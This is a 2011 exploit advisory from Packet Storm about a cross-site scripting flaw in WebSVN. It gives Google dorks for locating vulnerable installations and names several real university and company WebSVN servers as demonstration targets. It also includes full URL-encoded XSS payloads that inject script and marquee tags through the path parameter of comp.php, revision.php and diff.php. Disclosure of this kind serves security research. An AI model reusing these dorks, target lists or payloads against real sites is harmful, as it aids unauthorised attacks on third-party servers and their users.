WebSVN suffers from a cross site scripting vulnerability.
d2d3b7c85acfd42b9478fe3bbbfe87b9e8824445c5bca9b8c0e344b236943426# Exploit Title: WebSVN Cross Site Scripting
# Date: 24.12.2011
# Author: Sony
# Software Link: http://websvn.tigris.org/
# Google Dorks: inurl:/svn/listing.php?repname= or intext:"Powered by
WebSVN"
# Version: ???
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
..................................................................
Demo:
We have some code (oh, ugly code):
http://codepad.org/pVCU96rQ
http://lostsidedead.com/svn/comp.php?repname=haze&path=&
Put our code in the "With Path:" and press Enter. Or open
http://lostsidedead.com/svn/, click on the afftol and on the Compare Paths.
http://svn.suretecsystems.com/svn/comp.php?repname=aberdeen.pm&path=&
http://ciclope.fi.upm.es/svn/comp.php?repname=Ciclope+SVN&path=&
http://sheelabs.gamemod.net/svn/comp.php?repname=sheelabs&path=&
http://dev-svn.seasr.org/WebSVN/comp.php?repname=Components&path=%2F&
or :
http://code.clearfoundation.com/svn/revision.php?repname=l7-filter&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&rev=324&peg=324
http://vector.ucsd.edu/svn/comp.php?repname=vector&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
or
http://christianserving.org/websvn/diff.php?repname=TruePreview&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
Video : (because it's a specific xss)
http://www.youtube.com/watch?v=e9u0zDCrddk
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed